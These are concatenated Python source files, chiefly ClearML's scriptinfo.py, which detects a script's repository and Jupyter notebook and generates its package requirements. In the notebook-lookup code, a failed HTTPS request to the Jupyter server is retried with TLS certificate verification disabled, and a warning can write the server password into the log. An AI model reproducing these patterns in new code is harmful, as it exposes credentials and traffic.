window = Window(uid, make_unicode(title), url, html,
width, height, x, y, resizable, fullscreen, min_size, hidden,
frameless, easy_drag, minimized, on_top, confirm_close, background_color,
js_api, text_select, transparent)
windows.append(window)
if threading.current_thread().name != 'MainThread' and guilib:
window._initialize(guilib, _multiprocessing, _http_server)
guilib.create_window(window)
return window
@module_property
def screens():
guilib = initialize()
screens = guilib.get_screens()
return screens
|
scriptinfo.py
|
import os
import sys
from copy import copy
from datetime import datetime
from functools import partial
from tempfile import mkstemp, gettempdir
import attr
import logging
import json
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output, remove_user_pass_from_url
from ....backend_api import Session
from ....config import deferred_config, VCS_WORK_DIR
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
_detailed_import_report = deferred_config('development.detailed_import_report', False)
_max_requirements_size = 512 * 1024
_packages_remove_version = ('setuptools', )
_ignore_packages = set()
@classmethod
def _get_logger(cls):
return get_logger("Repository Detection")
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self, entry_point_filename=None, add_missing_installed_packages=False,
detailed_req_report=None):
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = self._remove_package_versions(
get_installed_pkgs_detail(), self._packages_remove_version)
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
'site-packages', 'dist-packages'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(
module_callback=ScriptRequirements.add_trains_used_packages, entry_point_filename=entry_point_filename)
if add_missing_installed_packages and guess:
for k in guess:
if k not in reqs:
reqs[k] = guess[k]
return self.create_requirements_txt(reqs, local_pks, detailed=detailed_req_report)
except Exception as ex:
self._get_logger().warning("Failed auto-generating package requirements: {}".format(ex))
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import boto3 # noqa: F401
modules.add('boto3', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from google.cloud import storage # noqa: F401
modules.add('google_cloud_storage', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from azure.storage.blob import ContentSettings # noqa: F401
modules.add('azure_storage_blob', 'clearml.storage', 0)
except Exception:
pass
# bugfix, replace sklearn with scikit-learn name
if 'sklearn' in modules:
sklearn = modules.pop('sklearn', {})
for fname, lines in sklearn.items():
modules.add('scikit_learn', fname, lines)
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules and 'tensorboardX' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch.utils.tensorboard # noqa: F401
# noinspection PyPackageRequirements,PyUnresolvedReferences
import tensorboard # noqa: F401
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
# remove setuptools, we should not specify this module version. It is installed by default
if 'setuptools' in modules:
modules.pop('setuptools', {})
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
for package, version in Task._force_requirements.items():
modules.add(package, 'clearml', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None, detailed=None):
# write requirements.txt
if detailed is None:
detailed = ScriptRequirements._detailed_import_report
# noinspection PyBroadException
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# the exception is cudatoolkit which we want to log anyhow
if r.get('name') == 'cudatoolkit' and r.get('version'):
conda_requirements += '{0} {1} {2}\n'.format(r.get('name'), '==', r.get('version'))
continue
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower()
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = None, None
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
else:
name = name.replace('-', '_')
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
if k and v is not None:
if v.version:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
conda_requirements += '{0}\n'.format(k)
except Exception:
conda_requirements = ''
# add forced requirements:
forced_packages = {}
ignored_packages = ScriptRequirements._ignore_packages
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
forced_packages = copy(Task._force_requirements)
# noinspection PyProtectedMember
ignored_packages = Task._ignore_requirements | ignored_packages
except Exception:
pass
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
if v.version:
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
else:
requirements_txt += '# {0}\n'.format(k)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
if k in ignored_packages or k.lower() in ignored_packages:
continue
version = v.version if v else None
if k in forced_packages:
forced_version = forced_packages.pop(k, None)
if forced_version is not None:
version = forced_version
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
requirements_txt += ScriptRequirements._make_req_line(k, version or None)
# add forced requirements that we could not find installed on the system
for k in sorted(forced_packages.keys()):
requirements_txt += ScriptRequirements._make_req_line(k, forced_packages.get(k))
requirements_txt_packages_only = requirements_txt
if detailed:
requirements_txt_packages_only = \
requirements_txt + '\n# Skipping detailed import analysis, it is too large\n'
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
if not v:
continue
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
# make sure we do not exceed the size a size limit
return (requirements_txt if len(requirements_txt) < ScriptRequirements._max_requirements_size
else requirements_txt_packages_only,
conda_requirements)
@staticmethod
def _make_req_line(k, version):
requirements_txt = ''
if k == '-e' and version:
requirements_txt += '{0}\n'.format(version)
elif k.startswith('-e '):
requirements_txt += '{0} {1}\n'.format(k.replace('-e ', '', 1), version or '')
elif version and str(version or ' ').strip()[0].isdigit():
requirements_txt += '{0} {1} {2}\n'.format(k, '==', version)
elif version and str(version).strip():
requirements_txt += '{0} {1}\n'.format(k, version)
else:
requirements_txt += '{0}\n'.format(k)
return requirements_txt
@staticmethod
def _remove_package_versions(installed_pkgs, package_names_to_remove_version):
installed_pkgs = {k: (v[0], None if str(k) in package_names_to_remove_version else v[1])
for k, v in installed_pkgs.items()}
return installed_pkgs
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
_jupyter_history_logger = None
_store_notebook_artifact = deferred_config('development.store_jupyter_notebook_artifact', True)
@classmethod
def _get_logger(cls):
return get_logger("Repository Detection")
@classmethod
def observer(cls, jupyter_notebook_filename, log_history):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
if log_history and cls._jupyter_history_logger is None:
cls._jupyter_history_logger = _JupyterHistoryLogger()
cls._jupyter_history_logger.hook()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_, **__):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from clearml import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception as ex:
cls._get_logger().warning('Could not read Jupyter Notebook: {}'.format(ex))
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# noinspection PyBroadException
try:
from ....version import __version__
our_module = cls.__module__.split('.')[0], __version__
except Exception:
our_module = None
# noinspection PyBroadException
try:
import re
replace_ipython_pattern = re.compile(r'\n([ \t]*)get_ipython\(\)')
replace_ipython_display_pattern = re.compile(r'\n([ \t]*)display\(')
except Exception:
replace_ipython_pattern = None
replace_ipython_display_pattern = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
script_code = None
fmodules = None
current_cell = None
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
if cls._jupyter_history_logger:
script_code, current_cell = cls._jupyter_history_logger.history_to_str()
else:
# noinspection PyBroadException
try:
# noinspection PyBroadException
try:
os.unlink(local_jupyter_filename)
except Exception:
pass
get_ipython().run_line_magic('history', '-t -f {}'.format(local_jupyter_filename))
with open(local_jupyter_filename, 'r') as f:
script_code = f.read()
# load the modules
from ....utilities.pigar.modules import ImportedModules
fmodules = ImportedModules()
for nm in set([str(m).split('.')[0] for m in sys.modules]):
fmodules.add(nm, 'notebook', 0)
except Exception:
continue
# get notebook python script
if script_code is None and local_jupyter_filename:
script_code, _ = _script_exporter.from_filename(local_jupyter_filename)
if cls._store_notebook_artifact:
# also upload the jupyter notebook as artifact
task.upload_artifact(
name='notebook',
artifact_object=Path(local_jupyter_filename),
preview='See `notebook preview` artifact',
metadata={'UPDATE': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')},
wait_on_upload=True,
)
# noinspection PyBroadException
try:
from nbconvert.exporters import HTMLExporter # noqa
html, _ = HTMLExporter().from_filename(filename=local_jupyter_filename)
local_html = Path(gettempdir()) / 'notebook_{}.html'.format(task.id)
with open(local_html.as_posix(), 'wt', encoding="utf-8") as f:
f.write(html)
task.upload_artifact(
name='notebook preview', artifact_object=local_html,
preview='Click `FILE PATH` link',
metadata={'UPDATE': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')},
delete_after_upload=True,
wait_on_upload=True,
)
except Exception:
pass
current_script_hash = hash(script_code + (current_cell or ''))
if prev_script_hash and prev_script_hash == current_script_hash:
continue
# remove ipython direct access from the script code
# we will not be able to run them anyhow
if replace_ipython_pattern:
script_code = replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', script_code)
if replace_ipython_display_pattern:
script_code = replace_ipython_display_pattern.sub(r'\n\g<1>print(', script_code)
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
if fmodules is None:
fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', script_code)
if current_cell:
cell_fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', current_cell)
# noinspection PyBroadException
try:
fmodules |= cell_fmodules
except Exception:
pass
# add current cell to the script
if current_cell:
script_code += '\n' + current_cell
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
# noinspection PyUnboundLocalVariable
installed_pkgs = get_installed_pkgs_detail()
# make sure we are in installed packages
if our_module and (our_module[0] not in installed_pkgs):
installed_pkgs[our_module[0]] = our_module
# noinspection PyUnboundLocalVariable
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
# noinspection PyProtectedMember
task._update_script(script=data_script)
# update requirements
# noinspection PyProtectedMember
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
max_diff_size_bytes = 500000
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _get_logger(cls):
return get_logger("Repository Detection")
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename, log_history=False):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename, log_history)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
if log_history:
get_ipython().events.register('post_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
# check if we are running in vscode, we have the jupyter notebook defined:
if 'IPython' in sys.modules:
# noinspection PyBroadException
try:
from IPython import get_ipython # noqa
ip = get_ipython()
# vscode-jupyter PR #8531 added this variable
local_ipynb_file = ip.__dict__.get('user_ns', {}).get('__vsc_ipynb_file__') if ip else None
if local_ipynb_file:
# now replace the .ipynb with .py
# we assume we will have that file available for monitoring
local_ipynb_file = Path(local_ipynb_file)
script_entry_point = local_ipynb_file.with_suffix('.py').as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file.as_posix(), log_history=False)
return script_entry_point
except Exception:
pass
if not (sys.argv[0].endswith(os.path.sep + 'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
server_info = None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
# noinspection PyBroadException
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
# noinspection PyPackageRequirements
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), '??server-*.json')):
# noinspection PyBroadException
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except Exception:
server_info = None
if server_info:
break
cookies = None
password = None
if server_info and server_info.get('password'):
# we need to get the password
from ....config import config
password = config.get('development.jupyter_server_password', '')
if not password:
cls._get_logger().warning(
'Password protected Jupyter Notebook server was found! '
'Add `sdk.development.jupyter_server_password=<jupyter_password>` to ~/clearml.conf')
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
r = requests.get(url=server_info['url'] + 'login')
cookies = {'_xsrf': r.cookies.get('_xsrf', '')}
r = requests.post(server_info['url'] + 'login?next', cookies=cookies,
data={'_xsrf': cookies['_xsrf'], 'password': password})
cookies.update(r.cookies)
auth_token = server_info.get('token') or os.getenv('JUPYTERHUB_API_TOKEN') or ''
try:
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(auth_token), })
except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
# noinspection PyUnresolvedReferences
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(auth_token), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
# send request to the jupyter server
try:
r.raise_for_status()
except Exception as ex:
cls._get_logger().warning('Failed accessing the jupyter server{}: {}'.format(
' [password={}]'.format(password) if server_info.get('password') else '', ex))
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = str(notebook_name or 'notebook').replace(
'>', '_').replace('<', '_').replace('.ipynb', '.py')
if not script_entry_point.lower().endswith('.py'):
script_entry_point += '.py'
local_ipynb_file = None
else:
# always slash, because this is from uri (so never backslash not even on windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# fix for VSCode pushing uuid at the end of the notebook name.
if not entry_point.exists():
# noinspection PyBroadException
try:
alternative_entry_point = '-'.join(entry_point_filename.split('-')[:-5])+'.ipynb'
# now we should try to find the actual file
entry_point_alternative = (Path.cwd() / alternative_entry_point).absolute()
if not entry_point_alternative.is_file():
entry_point_alternative = (Path.cwd() / alternative_entry_point).absolute()
# If we found it replace it
if entry_point_alternative.exists():
entry_point = entry_point_alternative
except Exception as ex:
cls._get_logger().warning('Failed accessing jupyter notebook {}: {}'.format(notebook_path, ex))
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file, is_google_colab)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(
str(script_path), str(cls._get_working_dir(repo_root, return_abs=True)))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _cwd(cls):
# return the current working directory (solve for hydra changing it)
# check if running with hydra
if sys.modules.get('hydra'):
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
import hydra # noqa
return Path(hydra.utils.get_original_cwd()).absolute()
except Exception:
pass
return Path.cwd().absolute()
@classmethod
def _get_working_dir(cls, repo_root, return_abs=False):
# get the repository working directory (might be different from actual cwd)
repo_root = Path(repo_root).absolute()
cwd = cls._cwd()
try:
# do not change: test if we are under the repo root folder, it will throw an exception if we are not
relative = cwd.relative_to(repo_root).as_posix()
return cwd.as_posix() if return_abs else relative
except ValueError:
# Working directory not under repository root, default to repo root
return repo_root.as_posix() if return_abs else '.'
@classmethod
def _absolute_path(cls, file_path, cwd):
# return the absolute path, relative to a specific working directory (cwd)
file_path = Path(file_path)
if file_path.is_absolute():
return file_path.as_posix()
# Convert to absolute and squash 'path/../folder'
return os.path.abspath((Path(cwd).absolute() / file_path).as_posix())
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(
cls, filepaths, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False, detect_jupyter_notebook=True,
add_missing_installed_packages=False, detailed_req_report=None):
jupyter_filepath = cls._get_jupyter_notebook_filename() if detect_jupyter_notebook else None
if jupyter_filepath:
scripts_path = [Path(os.path.normpath(jupyter_filepath)).absolute()]
else:
cwd = cls._cwd()
scripts_path = [Path(cls._absolute_path(os.path.normpath(f), cwd)) for f in filepaths if f]
scripts_path = [f for f in scripts_path if f.exists()]
if not scripts_path:
raise ScriptInfoError(
"Script file {} could not be found".format(filepaths)
)
scripts_dir = [f.parent for f in scripts_path]
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
script_dir = scripts_dir[0]
script_path = scripts_path[0]
plugin = next((p for p in cls.plugins if p.exists(script_dir)), None)
repo_info = DetectionResult()
messages = []
auxiliary_git_diff = None
if not plugin:
if log:
log.info("No repository found, storing script code instead")
else:
try:
repo_info = plugin.get_info(
str(script_dir), include_diff=check_uncommitted, diff_from_remote=uncommitted_from_remote)
except SystemExit:
raise
except Exception as ex:
_log("no info for {} ({})", scripts_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", scripts_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
# allow to override the VCS working directory (notice relative to the git repo)
# because we can have a sync folder on remote pycharm sessions
# not syncing from the Git repo, but from a subfolder, so the pycharm plugin need to pass the override
working_dir = VCS_WORK_DIR.get() if VCS_WORK_DIR.get() else cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
# make sure diff is not too big:
if len(diff) > cls.max_diff_size_bytes:
messages.append(
"======> WARNING! Git diff to large to store "
"({}kb), skipping uncommitted changes <======".format(len(diff)//1024))
auxiliary_git_diff = diff
diff = '# WARNING! git diff too large to store, clear this section to execute without it.\n' \
'# full git diff available in Artifacts/auxiliary_git_diff\n' \
'# Clear the section before enqueueing Task!\n'
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=script_path.as_posix()
if not repo_info.url and script_path.is_file() else None,
add_missing_installed_packages=add_missing_installed_packages,
detailed_req_report=detailed_req_report,
)
else:
script_requirements = None
script_info = dict(
repository=remove_user_pass_from_url(repo_info.url),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
repo_root=repo_root,
jupyter_filepath=jupyter_filepath,
)
# if repo_info.modified:
# messages.append(
# "======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
# script_info.get("repository", "")
# )
# )
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages, auxiliary_git_diff=auxiliary_git_diff),
script_requirements)
@classmethod
def get(cls, filepaths=None, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False, detect_jupyter_notebook=True, add_missing_installed_packages=False,
detailed_req_report=None):
try:
if not filepaths:
filepaths = [sys.argv[0], ]
return cls._get_script_info(
filepaths=filepaths,
check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log,
uncommitted_from_remote=uncommitted_from_remote,
detect_jupyter_notebook=detect_jupyter_notebook,
add_missing_installed_packages=add_missing_installed_packages,
detailed_req_report=detailed_req_report,
)
except SystemExit:
pass
except BaseException as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def is_running_from_module(cls):
# noinspection PyBroadException
try:
return '__main__' in sys.modules and vars(sys.modules['__main__'])['__package__']
except Exception:
return False
@classmethod
def detect_running_module(cls, script_dict):
# noinspection PyBroadException
try:
# If this is jupyter, do not try to detect the running module, we know what we have.
if script_dict.get('jupyter_filepath'):
return script_dict
if cls.is_running_from_module():
argvs = ''
git_root = os.path.abspath(str(script_dict['repo_root'])) if script_dict['repo_root'] else None
for a in sys.argv[1:]:
if git_root and os.path.exists(a):
# check if common to project:
a_abs = os.path.abspath(a)
if os.path.commonpath([a_abs, git_root]) == git_root:
# adjust path relative to working dir inside git repo
a = ' ' + os.path.relpath(
a_abs, os.path.join(git_root, str(script_dict['working_dir'])))
argvs += ' {}'.format(a)
# noinspection PyBroadException
try:
module_name = vars(sys.modules['__main__'])['__spec__'].name
except Exception:
module_name = vars(sys.modules['__main__'])['__package__']
# update the script entry point to match the real argv and module call
script_dict['entry_point'] = '-m {}{}'.format(module_name, (' ' + argvs) if argvs else '')
except Exception:
pass
return script_dict
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
auxiliary_git_diff = attr.ib(default=None)
class _JupyterHistoryLogger(object):
_reg_replace_ipython = r'\n([ \t]*)get_ipython\(\)'
_reg_replace_magic = r'\n([ \t]*)%'
_reg_replace_bang = r'\n([ \t]*)!'
def __init__(self):
self._exception_raised = False
self._cells_code = {}
self._counter = 0
self._ip = None
self._current_cell = None
# noinspection PyBroadException
try:
import re
self._replace_ipython_pattern = re.compile(self._reg_replace_ipython)
self._replace_magic_pattern = re.compile(self._reg_replace_magic)
self._replace_bang_pattern = re.compile(self._reg_replace_bang)
except Exception:
self._replace_ipython_pattern = None
self._replace_magic_pattern = None
self._replace_bang_pattern = None
def hook(self, ip=None):
if not ip:
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
return
self._ip = get_ipython()
else:
self._ip = ip
# noinspection PyBroadException
try:
# if this is colab, the callbacks do not contain the raw_cell content, so we have to patch it
if 'google.colab' in self._ip.extension_manager.loaded:
self._ip._org_run_cell = self._ip.run_cell
self._ip.run_cell = partial(self._patched_run_cell, self._ip)
except Exception:
pass
# start with the current history
self._initialize_history()
self._ip.events.register('post_run_cell', self._post_cell_callback)
self._ip.events.register('pre_run_cell', self._pre_cell_callback)
self._ip.set_custom_exc((Exception,), self._exception_callback)
def _patched_run_cell(self, shell, *args, **kwargs):
# noinspection PyBroadException
try:
raw_cell = kwargs.get('raw_cell') or args[0]
self._current_cell = raw_cell
except Exception:
pass
# noinspection PyProtectedMember
return shell._org_run_cell(*args, **kwargs)
def history(self, filename):
with open(filename, 'wt') as f:
for k, v in sorted(self._cells_code.items(), key=lambda p: p[0]):
f.write(v)
def history_to_str(self):
# return a pair: (history as str, current cell if we are in still in cell execution otherwise None)
return '\n'.join(v for k, v in sorted(self._cells_code.items(), key=lambda p: p[0])), self._current_cell
# noinspection PyUnusedLocal
def _exception_callback(self, shell, etype, value, tb, tb_offset=None):
self._exception_raised = True
return shell.showtraceback()
def _pre_cell_callback(self, *args, **_):
# noinspection PyBroadException
try:
if args:
self._current_cell = args[0].raw_cell
# we might have this value from somewhere else
if self._current_cell:
self._current_cell = self._conform_code(self._current_cell, replace_magic_bang=True)
except Exception:
pass
def _post_cell_callback(self, *_, **__):
# noinspection PyBroadException
try:
self._current_cell = None
if self._exception_raised:
# do nothing
self._exception_raised = False
return
self._exception_raised = False
# add the cell history
# noinspection PyBroadException
try:
cell_code = '\n' + self._ip.history_manager.input_hist_parsed[-1]
except Exception:
return
# fix magic / bang in code
cell_code = self._conform_code(cell_code)
self._cells_code[self._counter] = cell_code
self._counter += 1
except Exception:
pass
def _initialize_history(self):
# only once
if -1 in self._cells_code:
return
# noinspection PyBroadException
try:
cell_code = '\n' + '\n'.join(self._ip.history_manager.input_hist_parsed[:-1])
except Exception:
return
cell_code = self._conform_code(cell_code)
self._cells_code[-1] = cell_code
def _conform_code(self, cell_code, replace_magic_bang=False):
# fix magic / bang in code
if self._replace_ipython_pattern:
cell_code = self._replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', cell_code)
if replace_magic_bang and self._replace_magic_pattern and self._replace_bang_pattern:
cell_code = self._replace_magic_pattern.sub(r'\n# \g<1>%', cell_code)
cell_code = self._replace_bang_pattern.sub(r'\n# \g<1>!', cell_code)
return cell_code
|
_ipython_utils.py
|
"""Utilities for integrating with IPython
These functions should probably reside in Jupyter and IPython repositories,
after which we can import them instead of having our own definitions.
"""
import atexit
import os
try:
import queue
except ImportError:
# Python 2
import Queue as queue
import sys
from subprocess import Popen
from threading import Event, Thread
from uuid import uuid4
from IPython import get_ipython
from jupyter_client import BlockingKernelClient, write_connection_file
from jupyter_core.paths import jupyter_runtime_dir
from tornado.gen import TimeoutError
from tornado.ioloop import IOLoop
OUTPUT_TIMEOUT = 10
def run_cell_remote(ip, kc, cell):
"""Run a cell on a KernelClient
Any output from the cell will be redisplayed in the local session.
"""
msg_id = kc.execute(cell)
